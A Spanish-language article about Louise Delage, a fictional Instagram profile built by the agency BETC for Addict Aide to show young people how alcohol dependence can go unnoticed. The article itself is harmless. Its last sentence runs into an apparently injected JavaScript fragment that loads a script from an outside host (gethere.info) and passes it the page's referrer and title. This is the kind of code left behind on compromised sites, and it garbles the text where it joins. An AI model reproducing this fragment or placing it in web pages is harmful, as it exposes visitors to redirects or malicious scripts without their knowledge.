A primera vista, el perfil de Instagram de la joven francesa Louise Delage no es muy diferente a muchos otros que hay.
Loiuse se registró en Instagram a principios de agosto y literalemente en cuestión de semanas obtuvo decenas de miles de seguidores. En sus fotos la chica presume su vida interesante y despreocupada: paseos marítimos, encuentros con sus amigos, clubs nocturnos, sus paseos de compras y cenas en restaurantes.
Se podría creer que Louise tiene una vida de ensueño si no fuera por un pequeño detalle. ¿Lo notaste? En todas las fotos de la chica está presente el alcohol.
Casi en cada foto la chica o tiene una copa de alcohol en sus manos o lo consume. Incluso cuando no tiene nada en sus manos, el alcohol de todas formas aparece en las fotos.
A veces es difícil de notar en las fotos a primera vista pero existe. ¿Significará esto que la chica tiene un problema grave del cual ni siquiera se da cuenta?
No precisamente. Lo que sucede es que el perfil de Louise Delage es ficticio. Fue creado por la agencia publicitaria BETC sobre pedido de la organización Addict Aide como parte de una campaña social para informar a la juventud acerca de los peligros del alcoholismo.
Según el presidente de BETC, a veces no es tan fácil identificar el inicio de una dependencia de alcohol en tus seres queridos. Por ello decidió crear un perfil de Instagram de una persona con señales evidentes de este problema, de quien nadie podría sospechar que es alcóholica.
La mayor parte de los suscriptores admiraba la vida de esta bella chica sin darse cuenta de que tenía esas señales de alcoholismo a pesar de que eran más que obvias.
En otras palabras, el experimento funcionó. Louise Delage demostró que el alcoholismo puede convertirse en parte del estilo de vida de los jóvenes de forma desapercibida tanto para ellos como para las personas que los rodean.
Te dejamos el link para que veas el video de la campaña.
https://www.youtube.com/watch?v=ecRheslTlwE
“Esperamos que esta campaña les abra los ojos a algunas personas hacia aquello que les está sucediendo y que acudan a tiempo a pedir ayuda en Addict Aide o cualquier otra organización similar”, comentó la agencia publicitaria.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;